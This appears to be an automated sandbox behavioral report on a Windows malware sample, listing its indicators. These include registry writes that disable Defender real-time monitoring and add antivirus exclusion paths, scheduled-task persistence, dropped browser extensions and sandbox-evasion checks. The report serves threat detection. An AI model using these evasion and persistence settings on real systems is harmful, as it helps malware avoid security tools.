Analysis
-
max time kernel
236s -
max time network
240s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
11-07-2024 22:36
Static task
static1
Behavioral task
behavioral1
Sample
81bead4423c9e57e06a288cd5bf693980d602facccf8485f3c090b64463ca320.exe
Resource
win7-20240705-en
General
-
Target
81bead4423c9e57e06a288cd5bf693980d602facccf8485f3c090b64463ca320.exe
-
Size
7.3MB
-
MD5
99d63e380c13cf5e7bfe674c59a53364
-
SHA1
4033eef65935c48b3faa5a808e7bde0938c394d1
-
SHA256
81bead4423c9e57e06a288cd5bf693980d602facccf8485f3c090b64463ca320
-
SHA512
bbd8a5d6b71aaa3827248276de557ba59f573ec6aeb73c1ed304eec4fac16d96f3d62be2120ed72b24c13d1164e6c240e8ec055596a74178170df0835155f476
-
SSDEEP
196608:91OUbVkqHA4UO4qICSq2HvzSzJa2t5Wm3z5gF6cJsY5klgcFik2:3Ouo1qIZPma2t5WOzWp/klgcy
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\JHBMAPUCCwSCzfVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\hwSlakOgexbeQMmf = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\WIQLPldOU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\fjxFshYjVWUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\hwSlakOgexbeQMmf = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ixMyiQryENPMC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\hwSlakOgexbeQMmf = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\qMeQRvtmXyxU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\JHBMAPUCCwSCzfVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\iAgbdZKqqGsOfMIBo = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\WIQLPldOU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ixMyiQryENPMC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\wmJzyKeAXJXSYcIjGXR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\hwSlakOgexbeQMmf = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\wmJzyKeAXJXSYcIjGXR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\fjxFshYjVWUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\iAgbdZKqqGsOfMIBo = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\qMeQRvtmXyxU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 27 388 rundll32.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
pid Process 2348 powershell.exe 2800 powershell.EXE 2300 powershell.exe 1168 powershell.exe 2824 powershell.exe 1492 powershell.EXE 2496 powershell.EXE -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2660163958-4080398480-1122754539-1000\Control Panel\International\Geo\Nation fLbUxhl.exe -
Executes dropped EXE 4 IoCs
pid Process 2924 Install.exe 2332 Install.exe 600 KMGxOJw.exe 592 fLbUxhl.exe -
Loads dropped DLL 23 IoCs
pid Process 3044 81bead4423c9e57e06a288cd5bf693980d602facccf8485f3c090b64463ca320.exe 2924 Install.exe 2924 Install.exe 2924 Install.exe 2924 Install.exe 2332 Install.exe 2332 Install.exe 2332 Install.exe 1028 WerFault.exe 1028 WerFault.exe 1028 WerFault.exe 388 rundll32.exe 388 rundll32.exe 388 rundll32.exe 388 rundll32.exe 1316 WerFault.exe 1316 WerFault.exe 1316 WerFault.exe 1316 WerFault.exe 2384 WerFault.exe 2384 WerFault.exe 2384 WerFault.exe 1316 WerFault.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json fLbUxhl.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json fLbUxhl.exe -
Drops file in System32 directory 24 IoCs
description ioc Process File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini KMGxOJw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_76B4AC942398240FF309817636D6DBC9 fLbUxhl.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol fLbUxhl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDE8B1B7E253A9758EC380BD648952AF_A3D4688236962EEA03574DE4F61B95D9 fLbUxhl.exe File created C:\Windows\system32\GroupPolicy\gpt.ini KMGxOJw.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA fLbUxhl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_76B4AC942398240FF309817636D6DBC9 fLbUxhl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDE8B1B7E253A9758EC380BD648952AF_A3D4688236962EEA03574DE4F61B95D9 fLbUxhl.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA fLbUxhl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 fLbUxhl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 fLbUxhl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_D55A76EA86A3695733B952639E5D4848 fLbUxhl.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol KMGxOJw.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol KMGxOJw.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat fLbUxhl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_D55A76EA86A3695733B952639E5D4848 fLbUxhl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja fLbUxhl.exe File created C:\Program Files (x86)\qMeQRvtmXyxU2\BXTvnkf.xml fLbUxhl.exe File created C:\Program Files (x86)\WIQLPldOU\JAmYEH.dll fLbUxhl.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi fLbUxhl.exe File created C:\Program Files (x86)\wmJzyKeAXJXSYcIjGXR\JHScCUG.dll fLbUxhl.exe File created C:\Program Files (x86)\ixMyiQryENPMC\fLpGWWh.dll fLbUxhl.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi fLbUxhl.exe File created C:\Program Files (x86)\qMeQRvtmXyxU2\WJWAymuYEEXHF.dll fLbUxhl.exe File created C:\Program Files (x86)\wmJzyKeAXJXSYcIjGXR\GxKfCDj.xml fLbUxhl.exe File created C:\Program Files (x86)\fjxFshYjVWUn\MEhOPDU.dll fLbUxhl.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak fLbUxhl.exe File created C:\Program Files (x86)\WIQLPldOU\VTLAcVU.xml fLbUxhl.exe File created C:\Program Files (x86)\ixMyiQryENPMC\SMzQqLv.xml fLbUxhl.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bkCoNHObbyzyhGakUl.job schtasks.exe File created C:\Windows\Tasks\gYQNStpqGWmiKXVBK.job schtasks.exe File created C:\Windows\Tasks\zuAKRFeuERsPXGg.job schtasks.exe File created C:\Windows\Tasks\QlZOxIqYpWgOKmXex.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 1028 600 WerFault.exe 41 1316 2332 WerFault.exe 31 2384 592 WerFault.exe 185 -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates fLbUxhl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ KMGxOJw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" fLbUxhl.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" fLbUxhl.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs fLbUxhl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust fLbUxhl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed fLbUxhl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing fLbUxhl.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates fLbUxhl.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" fLbUxhl.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\9e-8a-a0-a5-58-d1 fLbUxhl.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\9e-8a-a0-a5-58-d1\WpadDecisionTime = d055e722e3d3da01 rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\9e-8a-a0-a5-58-d1\WpadDetectedUrl rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople fLbUxhl.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\9e-8a-a0-a5-58-d1 rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{7BFFFF04-C152-4236-B653-0E5648629E9A}\WpadNetworkName = "Network 3" fLbUxhl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My fLbUxhl.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs fLbUxhl.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates fLbUxhl.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs fLbUxhl.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0125000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 fLbUxhl.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs fLbUxhl.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates fLbUxhl.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs fLbUxhl.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs fLbUxhl.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{7BFFFF04-C152-4236-B653-0E5648629E9A}\WpadDecisionReason = "1" fLbUxhl.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\9e-8a-a0-a5-58-d1\WpadDecisionTime = d055e722e3d3da01 fLbUxhl.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs fLbUxhl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached KMGxOJw.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 fLbUxhl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings fLbUxhl.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs fLbUxhl.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates fLbUxhl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot fLbUxhl.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs fLbUxhl.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" fLbUxhl.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{7BFFFF04-C152-4236-B653-0E5648629E9A}\WpadDecisionTime = d055e722e3d3da01 fLbUxhl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA fLbUxhl.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs fLbUxhl.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs fLbUxhl.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates fLbUxhl.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0125000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings fLbUxhl.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix fLbUxhl.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates fLbUxhl.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{7BFFFF04-C152-4236-B653-0E5648629E9A}\WpadDecision = "0" fLbUxhl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed fLbUxhl.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs fLbUxhl.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\9e-8a-a0-a5-58-d1\WpadDecision = "0" fLbUxhl.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs fLbUxhl.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs fLbUxhl.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs fLbUxhl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople fLbUxhl.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root fLbUxhl.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates fLbUxhl.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1232 schtasks.exe 1748 schtasks.exe 940 schtasks.exe 2508 schtasks.exe 2932 schtasks.exe 2144 schtasks.exe 2540 schtasks.exe 1680 schtasks.exe 2984 schtasks.exe 1756 schtasks.exe 2604 schtasks.exe 2896 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 45 IoCs
pid Process 2824 powershell.exe 1492 powershell.EXE 1492 powershell.EXE 1492 powershell.EXE 2496 powershell.EXE 2496 powershell.EXE 2496 powershell.EXE 2348 powershell.exe 2800 powershell.EXE 2800 powershell.EXE 2800 powershell.EXE 592 fLbUxhl.exe 592 fLbUxhl.exe 592 fLbUxhl.exe 592 fLbUxhl.exe 592 fLbUxhl.exe 2300 powershell.exe 592 fLbUxhl.exe 592 fLbUxhl.exe 592 fLbUxhl.exe 1168 powershell.exe 592 fLbUxhl.exe 592 fLbUxhl.exe 592 fLbUxhl.exe 592 fLbUxhl.exe 592 fLbUxhl.exe 592 fLbUxhl.exe 592 fLbUxhl.exe 592 fLbUxhl.exe 592 fLbUxhl.exe 592 fLbUxhl.exe 592 fLbUxhl.exe 592 fLbUxhl.exe 592 fLbUxhl.exe 592 fLbUxhl.exe 592 fLbUxhl.exe 592 fLbUxhl.exe 592 fLbUxhl.exe 592 fLbUxhl.exe 592 fLbUxhl.exe 592 fLbUxhl.exe 592 fLbUxhl.exe 592 fLbUxhl.exe 592 fLbUxhl.exe 592 fLbUxhl.exe -
Suspicious use of AdjustPrivilegeToken 63 IoCs
description pid Process Token: SeDebugPrivilege 2824 powershell.exe Token: SeIncreaseQuotaPrivilege 2912 WMIC.exe Token: SeSecurityPrivilege 2912 WMIC.exe Token: SeTakeOwnershipPrivilege 2912 WMIC.exe Token: SeLoadDriverPrivilege 2912 WMIC.exe Token: SeSystemProfilePrivilege 2912 WMIC.exe Token: SeSystemtimePrivilege 2912 WMIC.exe Token: SeProfSingleProcessPrivilege 2912 WMIC.exe Token: SeIncBasePriorityPrivilege 2912 WMIC.exe Token: SeCreatePagefilePrivilege 2912 WMIC.exe Token: SeBackupPrivilege 2912 WMIC.exe Token: SeRestorePrivilege 2912 WMIC.exe Token: SeShutdownPrivilege 2912 WMIC.exe Token: SeDebugPrivilege 2912 WMIC.exe Token: SeSystemEnvironmentPrivilege 2912 WMIC.exe Token: SeRemoteShutdownPrivilege 2912 WMIC.exe Token: SeUndockPrivilege 2912 WMIC.exe Token: SeManageVolumePrivilege 2912 WMIC.exe Token: 33 2912 WMIC.exe Token: 34 2912 WMIC.exe Token: 35 2912 WMIC.exe Token: SeDebugPrivilege 1492 powershell.EXE Token: SeDebugPrivilege 2496 powershell.EXE Token: SeDebugPrivilege 2348 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2920 WMIC.exe Token: SeIncreaseQuotaPrivilege 2920 WMIC.exe Token: SeSecurityPrivilege 2920 WMIC.exe Token: SeTakeOwnershipPrivilege 2920 WMIC.exe Token: SeLoadDriverPrivilege 2920 WMIC.exe Token: SeSystemtimePrivilege 2920 WMIC.exe Token: SeBackupPrivilege 2920 WMIC.exe Token: SeRestorePrivilege 2920 WMIC.exe Token: SeShutdownPrivilege 2920 WMIC.exe Token: SeSystemEnvironmentPrivilege 2920 WMIC.exe Token: SeUndockPrivilege 2920 WMIC.exe Token: SeManageVolumePrivilege 2920 WMIC.exe Token: SeDebugPrivilege 2800 powershell.EXE Token: SeDebugPrivilege 2300 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2200 WMIC.exe Token: SeIncreaseQuotaPrivilege 2200 WMIC.exe Token: SeSecurityPrivilege 2200 WMIC.exe Token: SeTakeOwnershipPrivilege 2200 WMIC.exe Token: SeLoadDriverPrivilege 2200 WMIC.exe Token: SeSystemtimePrivilege 2200 WMIC.exe Token: SeBackupPrivilege 2200 WMIC.exe Token: SeRestorePrivilege 2200 WMIC.exe Token: SeShutdownPrivilege 2200 WMIC.exe Token: 